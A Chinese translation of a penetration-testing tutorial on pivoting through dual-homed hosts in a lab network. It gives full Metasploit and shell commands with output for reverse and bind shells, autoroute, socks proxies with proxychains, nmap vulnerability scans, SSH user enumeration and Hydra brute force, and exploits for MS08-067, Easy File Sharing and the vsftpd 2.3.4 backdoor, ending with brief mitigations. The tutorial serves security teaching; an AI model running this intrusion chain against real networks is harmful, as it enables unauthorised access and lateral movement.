原创翻译者:sanwenkit
按照纵深防御原则,重要服务往往通过多层安全架构进行保护。如果我们将其应用到组织内网,可以看到关键系统几乎不太可能与其他系统存在于同一网络中。在本文中,我们将会分析攻击者如何通过跳板对一开始无法直接访问的深层内网进行渗透的案例。
什么是路由
判断设备能否在不同网络间进行互相通讯的决策过程称为路由。通常路由在路由器中被实施,路由器通过路由表将数据包转发至目的地址。路由规则不仅仅可以在路由器等网络设备中实施,也可以在安装有操作系统的主机中实施。
- 根据上图中示例,为了成功地在192.168.1.0/24和192.168.10.0/24两个不同网段之间通信,需要一条路由表记录。根据在路由器中定义的规则,192.168.1.0/24 网段可以作为源地址访问192.168.10.0/24网段中的目的地址。
一个数据包的传输路径如下:
1、 IP地址是否在本地网络中?
在本地网络中,直接到达目的地址
不在本地网络中,发送至网关
2、 一旦路由器接收到数据包,它会查询自己的路由表,是否有匹配目的地址或目的地址网段的路由规则
如果有,将该数据包转发至目的地址
如果没有,继续发送至上层网关
3、 相同的过程在其他路由器中不断重复
4、 数据包最终可能会到达拥有外网出口的路由器,并被发送至外网
什么是跳板?
简单来说,它是一种通过使用跳板主机来访问隔离网段的过程。当攻击者掌握了一台能访问多个不同网段的跳板主机时,网络隔离就失效了。通过这个方法,攻击者可以在跳板机上实施路由来访问隔离网段。每一个发送到隔离网段的请求都需要通过端口转发,类似于隧道(tunnel)。
在上图的拓扑结构中,有一台设备配置了两块网络能够同时访问192.168.1.0/24和192.168.10.0/24两个不同网段。通常情况下,这个两个网段是隔离的,除非一个路由规则被配置。但是在当前情况中,这台双网卡设备的用户可以访问到DMZ区域中的设备。
构建第一个跳板和端口转发
根据我们的攻击场景,攻击者获取了DMZ区域内一台名为RD的设备的控制权限(meterpreter shell)。随后通过信息搜集发现,这台设备拥有双网卡。
备注:当前环境中的路由器不存在网段间的路由规则
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.0.20
LHOST => 172.16.0.20
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > run
[*] Started reverse TCP handler on 172.16.0.20:1234
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 172.16.0.11
[*] Meterpreter session 2 opened (172.16.0.20:1234 -> 172.16.0.11:49162)
meterpreter > ifconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC : 08:00:27:e1:3f:af
MTU : 1500
IPv4 Address : 172.16.0.11
IPv4 Netmask : 255.255.255.0
Interface 19
============
Name : Intel(R) PRO/1000 MT Desktop Adapter #2
Hardware MAC : 08:00:27:7f:3c:fe
MTU : 1500
IPv4 Address : 7.7.7.11
IPv4 Netmask : 255.255.255.0
按照攻击场景,获取了RD系统权限的攻击者想要访问第二块网卡的网段(7.7.7.0/24)。攻击者首先需要在RD系统中定义一条路由规则。
利用metasploit来实施这一操作是非常简单的。下面的命令能够用来在当前meterpreter会话中创建路由规则。
meterpreter > run autoroute -s 7.7.7.0/24
[*] Adding a route to 7.7.7.0/255.255.255.0...
[+] Added route to 7.7.7.0/255.255.255.0 via 172.16.0.11
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
7.7.7.0 255.255.255.0 Session 2
meterpreter >
根据定义的规则,在ID为2的meterpreter会话生命周期内,7.7.7.0/24网段能够被Metasploit框架访问。
在完成这项操作后,通过使用“arp_scanner”之类的后攻击模块,攻击者发现了主机JC的IP地址。JC是该网段中的另一台主机 -7.7.7.20-
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24
[*] Running module against DISCORDIA
[*] ARP Scanning 7.7.7.0/24
[*] IP: 7.7.7.11 MAC 08:00:27:7f:3c:fe (CADMUS COMPUTER SYSTEMS)
[*] IP 7.7.7.12 MAC 08:00:27:3a:b2:c1 (CADMUS CIMPUTER SYSTEMS)
[*] IP: 7.7.7.20 MAC 08:00:27:fa:a0:c5 (CADMUS COMPUTER SYSTEMS)
[*] IP: 7.7.7.255 MAC 08:00:27:3f:2a:b5 (CADMUS COMPUTER SYSTEMS)
meterpreter >
现在,在7.7.7.0/24网段中的存活主机IP地址,包括JC主机,都已经被发现了。
自然地,下一个问题出现了,用arp_scanner之类的后攻击模块来执行这些扫描工作是不够高效的。能否使用类似nmap之类的工具?
通过跳板使用NMAP
为了实现nmap扫描,metasploit中的路由配置需要被激活,并且需要通过socks4代理进行流量转发。Metasploit中存在这样的模块满足需求。
使用Metasploit中的socks4代理模块:
meterpreter > background
[*] Backgrounding session 2...
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf auxiliary(socks4a) > set srvhost 172.16.0.20
srvhost => 172.16.0.20
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > netstat -antp | grep 1080
[*] exec: netstat -antp | grep 1080
tcp 0 172.16.0.20:1080 0.0.0.0:* LISTEN 3626/ruby
msf auxiliary(socks4a) >
使用GNU\Linux操作系统内置的ProxyChains工具,任何TCP连接都能通过TOR、SCOKS4、SOCKS、HTTP/HTTPS等代理方式进行转发。在这项隧道技术中,可以嵌套多层代理。除了提供匿名性以外,如跳板机这样的利用也能实现向隔离的内部网络导入流量。
使用编辑器在文件/etc/proxychains.conf的最后一行加入socks4代理的配置信息。
--- snippet ---
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks4 172.16.0.20 1080
通过proxychains执行nmap扫描是一个简单的操作。流量包会通过定义的代理端口被导入到目标网络.
root@kali:~# proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 7.7.7.20
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.25BETA1 ( https://nmap.org )
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK
Nmap scan report for 7.7.7.20
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh Bitvise WinSSHD 7.16 (FlowSsh 7.15; protocol 2.0)
80/tcp closed http Easy File Sharing Web Server httpd 6.9
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds
root@kali:~#
根据扫描结果,目标主机上存在SSH和HTTP服务。在进行进一步利用之前,我们将会讲到另外一个技术端口转发.
端口转发
端口转发是实现跳板的一项基本步骤。对于内部隔离网络中服务(web服务器等等)来说,直接访问往往是不可行的。这是因为没有配置双向路由。我们知道如何让请求到达目标系统,但由于目标系统并不知道如何访问我们,我们的请求会最终失败.
为此,我们在自己的系统中创建一个至目标网络的路由端口。这个路由的生命周期仅限于路由端口进程的运行期间。
另外需要着重提出的一点是,在Metasploit框架中使用“run autoroute”命令创建路由规则后,我们还需要通过端口转发或者proxychains之类的工具才能使kali中的系统工具访问到目标网络。
端口转发可以通过metasploit中的portfwd后攻击模块来实施
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> Forward: local host to listen on (optional). Remote: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter >
当我们使用自己的浏览器访问本地2323端口时,这个连接请求会被转发到IP地址7.7.7.20的80端口。
此前通过nmap和proxychains,我们已经发现7.7.7.20的主机时在TCP 80端口运行了web服务。为了能够访问这个服务,本地系统的2323端口应该被路由至7.7.7.20的80端口.
meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20
[*] Local TCP relay created: 172.16.0.20:2323 <-> 7.7.7.20:80
meterpreter >
激活的转发规则可以通过“portfwd list”命令来查看.
meterpreter > portfwd list
Active Port Forwards
====================
Index Local Remote Direction
----- ----- ------ ---------
1 172.16.0.20:2323 7.7.7.20:80 Forward
1 total active port forwards.
meterpreter >
识别运行在7.7.7.20主机80端口的应用,发现这是一个Eash File Sharing Web Server
通过跳板进行SSH暴力破解
通过跳板进行SSH暴力破解
此前,7.7.7.20主机也被发现存在SSH服务。对这台主机执行一次暴力破解也是非常简单的。
使用“ssh_enumusers”模块来枚举用户:
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > set rhosts 7.7.7.20
rhosts => 7.7.7.20
msf auxiliary(ssh_enumusers) > set rport 22
rport => 22
msf auxiliary(ssh_enumusers) > set user_file /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt
user_file => /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt
msf auxiliary(ssh_enumusers) > run
[*] 7.7.7.20:22 - SSH - Checking for false positives
[*] 7.7.7.20:22 - SSH - Starting scan
[+] 7.7.7.20:22 - SSH - User 'admin' found
[-] 7.7.7.20:22 - SSH - User 'root' not found
[-] 7.7.7.20:22 - SSH - User 'Administrator' not found
[+] 7.7.7.20:22 - SSH - User 'sysadm' found
[-] 7.7.7.20:22 - SSH - User 'tech' not found
[-] 7.7.7.20:22 - SSH - User 'operator' not found
[+] 7.7.7.20:22 - SSH - User 'guest' found
[-] 7.7.7.20:22 - SSH - User 'security' not found
[-] 7.7.7.20:22 - SSH - User 'debug' not found
[+] 7.7.7.20:22 - SSH - User 'manager' found
[-] 7.7.7.20:22 - SSH - User 'service' not found
[-] 7.7.7.20:22 - SSH - User '!root' not found
[+] 7.7.7.20:22 - SSH - User 'user' found
[-] 7.7.7.20:22 - SSH - User 'netman' not found
[+] 7.7.7.20:22 - SSH - User 'super' found
[-] 7.7.7.20:22 - SSH - User 'diag' not found
[+] 7.7.7.20:22 - SSH - User 'Cisco' found
[-] 7.7.7.20:22 - SSH - User 'Manager' not found
[+] 7.7.7.20:22 - SSH - User 'DTA' found
[-] 7.7.7.20:22 - SSH - User 'apc' not found
[+] 7.7.7.20:22 - SSH - User 'User' found
[-] 7.7.7.20:22 - SSH - User 'Admin' not found
[+] 7.7.7.20:22 - SSH - User 'cablecom' found
[-] 7.7.7.20:22 - SSH - User 'adm' not found
[+] 7.7.7.20:22 - SSH - User 'wradmin' found
[-] 7.7.7.20:22 - SSH - User 'netscreen' not found
[+] 7.7.7.20:22 - SSH - User 'sa' found
[-] 7.7.7.20:22 - SSH - User 'setup' not found
[+] 7.7.7.20:22 - SSH - User 'cmaker' found
[-] 7.7.7.20:22 - SSH - User 'enable' not found
[+] 7.7.7.20:22 - SSH - User 'MICRO' found
[-] 7.7.7.20:22 - SSH - User 'login' not found
[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
^C
msf auxiliary(ssh_enumusers) >
除了Metasploit框架中的辅助模块,kali中的系统工具例如Hydra也是可以使用的。通过ProxyChains运行hydra,所有的流量都会通过跳板机导入到目标网络中.
root@kali:~# proxychains hydra 7.7.7.20 ssh -s 22 -L /tmp/user.txt -P top100.txt -t 4
ProxyChains-3.1 (http://proxychains.sf.net)
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 20 login tries (l:2/p:10), ~0 tries per task
[DATA] attacking service ssh on port 22
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
|S-chain|-<>-172.16.0.20:1080-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
<><>-OK
<><>-OK
<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
[22][ssh] host: 7.7.7.20 login: admin password: 123456
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished
root@kali:~#
root@kali:~# proxychains ssh admin@7.7.7.20
ProxyChains-3.1 (http://proxychains.sf.net)
|D-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK
The authenticity of host '7.7.7.20 (7.7.7.20)' can't be established.
ECDSA key fingerprint is SHA256:Rcz2KrPF3BTo16Ng1kET91ycbr9c8vOkZcZ6b4VawMQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '7.7.7.20' (ECDSA) to the list of known hosts.
admin@7.7.7.20's password:
bvshell:/C/Documents and Settings/All Users$ pwd
/C/Documents and Settings/All Users
bvshell:/C/Documents and Settings/All Users$ dir
2016-12-24 21:32 <DIR> Application Data
2016-12-25 06:16 <DIR> Desktop
2016-12-24 18:36 <DIR> Documents
2016-12-24 18:37 <DIR> DRM
2016-12-24 21:32 <DIR> Favorites
2016-12-24 18:38 <DIR> Start Menu
2016-12-24 21:32 <DIR> Templates
0 Files 0 bytes
7 Directories
bvshell:/C/Documents and Settings/All Users$
获取第二个跳板
此前的nmap扫描中,我们在7.7.7.0/24网段中发现来两个漏洞,分别是MS08-067和“Easy File Share”应用的BoF漏洞。通过任意漏洞都能够获取目标系统的控制权限。当然,还有SSH登录这个额外的选择
MS08-067 with Bind TCP
在metasploit框架中可以使用模块“exploit/windows/smb/ms08_067_netapi”来实施MS08-067利用。关键点在于载荷类型的选择是TCP绑定类型。由于没有定义双向路由规则,目标系统不能直接访问攻击者。因此,需要选择TCP绑定类型在目标系统中创建一个特定的监听端口等待攻击者连接。漏洞成功利用后,将会自动向目标系统的监听端口发起建立连接操作。
TCP反弹和TCP绑定的区别如下图所示:
配置TCP绑定方式的MS08-067漏洞利用模块,并获取目标系统权限:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set rhost 7.7.7.20
rhost => 7.7.7.20
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 7.7.7.20 yes The target address
RPORT 445 yes The SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 7.7.7.20 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > run
[*] Started bind handler
[*] 7.7.7.20:445 - Automatically detecting the target...
[*] 7.7.7.20:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English
[*] 7.7.7.20:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 7.7.7.20:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 7.7.7.20
[*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444)
meterpreter >
Easy File Share BoF
另外一个漏洞是Easy File Share应用。通过以下步骤配置漏洞利用模块为TCP绑定方式,并获取系统权限。
msf > use exploit/windows/http/easyfilesharing_seh
msf exploit(easyfilesharing_seh) > show options
Module options (exploit/windows/http/easyfilesharing_seh):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 80 yes The target port
Exploit target:
Id Name
-- ----
0 Easy File Sharing 7.2 HTTP
msf exploit(easyfilesharing_seh) > set rhost 7.7.7.20
rhost => 7.7.7.20
msf exploit(easyfilesharing_seh) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(easyfilesharing_seh) > run
[*] Started bind handler
[*] 7.7.7.20:80 - 7.7.7.20:80 - Sending exploit...
[+] 7.7.7.20:80 - Exploit Sent
[*] Sending stage (957999 bytes) to 7.7.7.20
[*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) at 2016-12-26 14:21:11 +0300
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 65539
============
Name : Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC : 08:00:27:29:cd:cb
MTU : 1500
IPv4 Address : 8.8.8.3
IPv4 Netmask : 255.255.255.0
Interface 65540
============
Name : Intel(R) PRO/1000 MT Desktop Adapter #2
Hardware MAC : 08:00:27:e3:47:43
MTU : 1500
IPv4 Address : 7.7.7.20
IPv4 Netmask : 255.255.255.0
meterpreter >
完成以后,攻击者来到来如下位置:
由于我们获取了7.7.7.20主机的控制权限。我们需要再次进行信息搜集。JC主机和RD一样也拥有双网卡。这意味着我们又发现了一个新的内网(8.8.8.0/24)。
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 65539
============
Name : Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC : 08:00:27:29:cd:cb
MTU : 1500
IPv4 Address : 8.8.8.3
IPv4 Netmask : 255.255.255.0
Interface 65540
============
Name : Intel(R) PRO/1000 MT Desktop Adapter #2
Hardware MAC : 08:00:27:e3:47:43
MTU : 1500
IPv4 Address : 7.7.7.20
IPv4 Netmask : 255.255.255.0
让我们继续通过arp scanner在第二个内网进行信息搜集。
meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24
[*] Running module against SRV03
[*] ARP Scanning 8.8.8.0/24
[*] IP: 8.8.8.3 MAC 08:00:27:29:cd:cb (CADMUS COMPUTER SYSTEMS)
[*] IP: 8.8.8.1 MAC 0a:00:27:00:00:03 (UNKNOWN)
[*] IP: 8.8.8.9 MAC 08:00:27:56:f1:7c (CADMUS COMPUTER SYSTEMS)
[*] IP: 8.8.8.13 MAC 08:00:27:13:a3:b1 (CADMUS COMPUTER SYSTEMS)
ARP扫描发现这个网段中存在4台机器.
meterpreter > run autoroute -s 8.8.8.0/24
[*] Adding a route to 8.8.8.0/255.255.255.0...
[+] Added route to 8.8.8.0/255.255.255.0 via 7.7.7.20
[*] Use the -p option to list all active routes
msf > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
7.7.7.0 255.255.255.0 Session 1
8.8.8.0 255.255.255.0 Session 3
并且我们继续添加路由规则。这一点在下一章中我们会继续聊。
双重跳板
8.8.8.0/24网段通过JC主机的信息搜集过程被发现了。通过第一台跳板机,我们已经有了一条在172.16.0.0/24和7.7.7.0/24网段之间的路由规则。
目前的情况下,来自172.16.0.20的数据包通过RD主机的转发访问到JC主机。
如果172.16.0.20的攻击者希望访问新发现的8.8.8.0/24网段,一个新的路由规则需要被定义。在metasploit框架外部的工具中,我们需要运行一个新的socks4服务来连接两个跳板并且创建一个新的proxychains配置项。
来自攻击者机器172.16.0.20的数据包将会经过两个不同的端点才能抵达8.8.8.9目标地址。
RD:我不知道怎么到达IP地址8.8.8.9,但是我知道JC知道怎么达到。我会把流量导向它
JC:我知道怎么把来自7.7.7.0/24网段的包转发至8.8.8.0/24网段
最终攻击者控制和发现的系统如下图所示:
厉害的Proxychains
ProxyChains工具能够连接代理服务器并完成连接转换。目前,一个新的sock4代理服务正监听在本地1081端口并转发至8.8.8.0/24网段.
msf exploit(ms08_067_netapi) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 172.16.0.20 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf auxiliary(socks4a) > set SRVPORT 1081
SRVPORT => 1081
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >
新的代理服务将会在/etc/proxychains.conf配置文件中被添加。通过激活“Dynamic Chain”设置,多个代理之间的按序转接可以被实现font>.
root@kali:~# cat /etc/proxychains.conf | grep -v "#"
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks4 172.16.0.20 1080 # First Pivot
socks4 172.16.0.20 1081 # Second Pivot
通过proxychain工具,目标8.8.8.9可以通过第二个跳板途径来进行nmap扫描.
root@kali:~# proxychains nmap -sT -sV -p21,22,23,80 8.8.8.9 -n -Pn -vv
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.25BETA1 ( https://nmap.org )
Nmap wishes you a merry Christmas! Specify -sX for Xmas Scan (https://nmap.org/book/man-port-scanning-techniques.html).
NSE: Loaded 36 scripts for scanning.
Initiating Connect Scan
Scanning 8.8.8.9 [4 ports]
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK
Discovered open port 21/tcp on 8.8.8.9
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK
Discovered open port 23/tcp on 8.8.8.9
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK
Discovered open port 22/tcp on 8.8.8.9
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK
Discovered open port 80/tcp on 8.8.8.9
Completed Connect Scan at 05:54, 1.37s elapsed (4 total ports)
Initiating Service scan at 05:54
Scanning 4 services on 8.8.8.9
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK
Completed Service scan at 05:54, 11.09s elapsed (4 services on 1 host)
NSE: Script scanning 8.8.8.9.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:54
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK
|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK
Completed NSE at 05:54, 1.71s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:54
Completed NSE at 05:54, 0.00s elapsed
Nmap scan report for 8.8.8.9
Host is up, received user-set (0.41s latency).
Scanned
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.3.4
22/tcp open ssh syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet syn-ack Linux telnetd
80/tcp open http syn-ack Apache httpd 2.2.8 ((Ubuntu) DAV/2)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds
root@kali:~#
可以看到,数据包首先通过第一个代理服务,随后经过第二个代理服务,最终到达目的地址。
分析扫描结果发现,8.8.8.9主机上运行的vsftpd服务为一个存在漏洞的版本。
以下步骤完成了metasploit中vsftpd漏洞利用的配置,获取了我们最终目标的权限
msf >
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set rhost 8.8.8.9
rhost => 8.8.8.9
msf exploit(vsftpd_234_backdoor) > run
[*] 8.8.8.9:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 8.8.8.9:21 - USER: 331 Please specify the password.
[+] 8.8.8.9:21 - Backdoor service has been spawned, handling...
[+] 8.8.8.9:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 4 opened (Local Pipe -> Remote Pipe)
pwd
/
id
uid=0(root) gid=0(root)
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:56:f1:7c
inet addr:8.8.8.9 Bcast:8.8.8.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe56:f17c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:10843 errors:0 dropped:0 overruns:0 frame:0
TX packets:2779 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1081842 (1.0 MB) TX bytes:661455 (645.9 KB)
Base address:0xd010 Memory:f0000000-f0020000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:18161 errors:0 dropped:0 overruns:0 frame:0
TX packets:18161 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:5307479 (5.0 MB) TX bytes:5307479 (5.0 MB)
总结
攻击者通过以下步骤发现了两个不同的内网隔离网段:
1、 攻击者获取了相同网段中RD主机的权限
2、 攻击者发现RD主机拥有两个网络连接
3、 攻击者使用autoroute模块定义了一个路由规则
4、 攻击者在7.7.70/24网段进行了ARP和NMAP扫描并发现了主机JC
5、 主机JC存在“Easy File Share”和MS08-067两个不同漏洞
6、 通过MS08-067的成功利用让攻击者获取了7.7.7.20的权限
7、 通过对JC主机进行信息搜集发现同样拥有两个网络连接
8、 在7.7.7.20上创建了一条新的路由规则
9、 在8.8.8.0/24网段实施ARP和NMAP扫描
10、 IP地址为8.8.8.9的主机SK运行着存在漏洞的vsftpd
搞定收工
在攻击者的系统只拥有第一个内网的访问权限的情况下,可以通过一系列攻击获取另外两个隔离网络的访问控制权限.
视频
https://www.youtube.com/embed/awLMbwj5iP0?feature=oembed
缓解措施
- DMZ区域中包含多块网卡的系统应该被尽快移除
- DMZ区域中的系统只能在DMZ区域中被访问
参考:
http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html
https://www.sans.org/reading-room/whitepapers/testing/post-exploitation-metasploit-pivot-port-33909
https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
~~~